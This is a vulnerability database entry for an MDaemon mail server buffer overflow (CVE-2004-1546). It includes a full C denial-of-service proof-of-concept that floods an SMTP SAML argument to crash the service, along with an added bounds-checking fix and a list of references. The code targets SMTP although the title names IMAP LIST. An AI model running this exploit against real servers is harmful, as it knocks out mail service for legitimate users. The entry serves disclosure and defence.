MDaemon IMAP Server LIST Command Remote Buffer Overflow Vulnerability

Vulnerability ID: 1108175 Vulnerability type: Boundary condition error
Published: 2004-09-16 Updated: 2005-10-20
CVE ID: CVE-2004-1546
CNNVD-ID: CNNVD-200412-419
Platform: Windows CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/24624
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-419
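|Vulnerability details
Alt-N MDaemon is a Windows-based mail server. The MDaemon IMAP service does not properly check buffer lengths when handling the LIST command; a remote attacker can exploit this to overflow a buffer in the service and possibly execute arbitrary instructions with the privileges of the process. The MDaemon IMAP service handles the LIST command incorrectly: submitting an overlong argument causes a buffer overflow that crashes the program, and carefully constructed input may allow arbitrary instructions to be executed with the privileges of the process.
|Exploit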
source: http://www.securityfocus.com/bid/11238/info

Alt-N MDaemon is reportedly prone to multiple remote buffer overflow vulnerabilities. The vulnerabilities are likely due to a failure of the application to properly validate buffer sizes when processing command argument input.

By sending a large argument to certain SMTP commands or an IMAP command it is possible to cause this issue to present itself. Apparently, the application will not validate the size of the input before copying it into a finite buffer in process memory.

These issues can be leveraged to cause the affected process to crash, denying service to legitimate users. It is conjectured that these issues can also be leveraged to execute arbitrary code with the privileges of the user running the server on an affected computer.

/////////////////////////////////////////////////////////////
//        Remote DoS and proof-of-concept exploit          //
//                         for               		   //
//               Mdaemon smtp server v6.5.1                //
//	                   and                             //
//                possible other version.                  //
//                   Find bug: D_BuG.        		   //
//                    Author: D_BuG.                       //
//                     [email protected]            		   //                
//                   Data: 16/09/2004        		   //
//                     NOT PUBLIC!                         //
//		      Greets:Rasco.                        // 
/////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int     sock,err;
struct  sockaddr_in sa;


int main (int argc, char *argv[])
{
	printf("Remote DoS and proof-of-concept(buffer overflow) exploit\n");
	printf("                         for                              \n");
	printf("Mdaemon smtp server v6.5.1 and possible other version.\n");
	if(argc!=4)
	{
		printf("Usage: %s <IPADDRESS> <PORT> <TARGET>\n",argv[0]);
		printf("Target:\n1.DoS.\n2.Proof-of-concept(buffer overflow).\n");
		printf("e.g.:%s 192.168.1.1 25 1\n",argv[0]);
		exit(-1);
	}

	sa.sin_family=AF_INET;
	sa.sin_port=htons(atoi(argv[2]));
	if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
		printf("Error inet_pton\n");

	sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

	printf("[~]Connecting...\n");

	if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
	{
		printf("[-]Connect filed....\nExit...\n");
		exit(-1);
	}

	/* Argument length: 247 bytes for target 1, 248 bytes for target 2 */
	int len=247;

	if(atoi(argv[3])==2)
	{
		len++;
	}

	char szBuffer[len+7];
	char buff[len];
	char send[]="EHLO tester\n";
	char send3[]="RCPT TO postmaster\n";
	char rcv[1024];
	int i;
	for(i=0;i<len;i++)
	{
		buff[i]=0x41;
	}

	sprintf(szBuffer,"SAML %s\n",buff);

	printf("[+]Ok!\n");
	sleep(2);
	printf("[~]Get banner...\n");
	if(read(sock,&rcv,sizeof(rcv)) !=-1){}

	if(strstr(rcv,"220")==NULL)
	{
		printf("[-]Failed!\n");
	}
	else
	{
		printf("[+]Ok!\n");
	}

	printf("[~]Send EHLO...\n");
	write(sock,send,sizeof(send)-1);
	sleep(2);
	memset(rcv,0,1024);
	if(read(sock,&rcv,sizeof(rcv)) !=-1){}

	if(strstr(rcv,"250")==NULL)
	{
		printf("[-]Failed...\n");
	}
	else
	{
		printf("[+]Ok!\n");
	}
	printf("[~]Send SAML...\n");
	write(sock,szBuffer,strlen(szBuffer));//Send SAML
	sleep(2);
	memset(rcv,0,1024);
	if(read(sock,&rcv,sizeof(rcv)) !=-1){}

	if(strstr(rcv,"250")==NULL)
	{
		printf("[-]Exploit failed...please check your version Mdaemon!\n");
		printf("[-]Exit...\n");
		exit(-1);
	}
	printf("[+]Ok!\n");

	printf("[~]Send RCPT...\n\n");
	write(sock,send3,sizeof(send3)-1);//Send RCPT
	sleep(2);
	if(atoi(argv[3])==2)
	{
		printf("[+]Crash service.....\n");
	}
	else
	{
		printf("[+]DoS service.....\n");
	}
	printf("[~]Done.\n");

	close(sock);

	return 0;
}
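The advisory text above attributes the flaw to command arguments being copied into a fixed buffer without a size check. The following added example (not part of the original entry and not MDaemon's code) shows the server-side check that prevents this class of bug; `parse_command`, `ARG_BUF` and the return codes are hypothetical names, and the 128-byte buffer size is an assumption chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

#define MAX_LINE 512   /* RFC 5321 command-line limit, CRLF included */
#define ARG_BUF  128   /* assumed size of the handler's fixed argument buffer */

enum parse_rc { PARSE_OK = 0, PARSE_LINE_TOO_LONG, PARSE_NO_TERMINATOR,
                PARSE_ARG_TOO_LONG, PARSE_BAD_VERB };

/* Hypothetical helper: split "VERB argument\r\n" and copy the argument into a
 * fixed buffer only after its length has been checked against the buffer. */
enum parse_rc parse_command(const char *line, size_t line_len,
                            char verb[8], char arg[ARG_BUF])
{
    if (line_len > MAX_LINE)
        return PARSE_LINE_TOO_LONG;

    /* Require a line terminator inside the received bytes. */
    const char *eol = memchr(line, '\n', line_len);
    if (eol == NULL)
        return PARSE_NO_TERMINATOR;
    size_t body = (size_t)(eol - line);
    if (body > 0 && line[body - 1] == '\r')
        body--;

    /* The verb runs up to the first space (or to the end of the line). */
    const char *sp = memchr(line, ' ', body);
    size_t verb_len = sp ? (size_t)(sp - line) : body;
    if (verb_len == 0 || verb_len >= 8)
        return PARSE_BAD_VERB;
    memcpy(verb, line, verb_len);
    verb[verb_len] = '\0';

    /* The check the advisory says was missing: size before copy. */
    size_t arg_len = sp ? body - verb_len - 1 : 0;
    if (arg_len >= ARG_BUF)
        return PARSE_ARG_TOO_LONG;
    if (arg_len > 0)
        memcpy(arg, sp + 1, arg_len);
    arg[arg_len] = '\0';
    return PARSE_OK;
}

int main(void)
{
    char verb[8], arg[ARG_BUF];
    /* Constructed sample input: a well-formed greeting. */
    return parse_command("EHLO tester\r\n", 13, verb, arg) == PARSE_OK ? 0 : 1;
}
```

A handler built this way answers an overlong argument with a protocol error instead of writing past the buffer; the same length gate applies to the IMAP LIST argument.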
|References

Source: XF
Name: mdaemon-smtp-bo(17477)
Link: http://xforce.iss.net/xforce/xfdb/17477
Source: BID
Name: 11238
Link: http://www.securityfocus.com/bid/11238
Source: FULLDISC
Name: 20040922 Remote buffer overflow in MDaemon IMAP and SMTP server
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2004-September/026770.html
Source: XF
Name: mdaemon-imap-list-bo(17476)
Link: http://xforce.iss.net/xforce/xfdb/17476
Source: www.securitylab.ru
Link: http://www.securitylab.ru/48146.html
Source: OSVDB
Name: 10224
Link: http://www.osvdb.org/10224
Source: OSVDB
Name: 10223
Link: http://www.osvdb.org/10223
Source: BUGTRAQ
Name: 20040922 Remote buffer overflow in MDaemon IMAP and SMTP server
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=109591179510781&w=2
Source: NSFOCUS
Name: 6949※6948
Link: http://www.nsfocus.net/vulndb/6949※6948
